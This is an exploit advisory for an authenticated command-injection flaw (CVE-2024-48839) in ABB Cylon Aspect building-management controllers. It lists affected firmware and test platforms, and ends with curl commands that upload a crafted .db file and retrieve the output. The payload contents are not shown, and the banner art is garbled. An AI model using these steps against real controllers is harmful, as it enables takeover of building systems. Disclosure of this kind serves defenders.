## https://sploitus.com/exploit?id=1337DAY-ID-39860
ABB Cylon Aspect 3.08.02 (uploadDb.php) Remote Code Execution
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.02
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an authenticated
OS command injection vulnerability. This can be exploited to inject and execute
arbitrary shell commands through the contents of an uploaded .db file, which
is passed to the copyFile.sh script. Although the filename is sanitized, the
contents of the .db file are not, allowing attackers to inject malicious commands
that are executed on the server.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5904
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5904.php
CVE ID: CVE-2024-48839
CVE URL: CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48839
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
ββββββββββββββββββββββββββ βββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββ ββββββββββββ
βββββββββββββββββββββββββββββββββββββββ
ββββββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββ ββββββββββββ
$ curl -s http://192.168.73.31/uploadDb.php \
> -H "Cookie: PHPSESSID=xxx" \
> -F "[emailΒ protected]"
$ curl http://192.168.73.31/database/testingus.db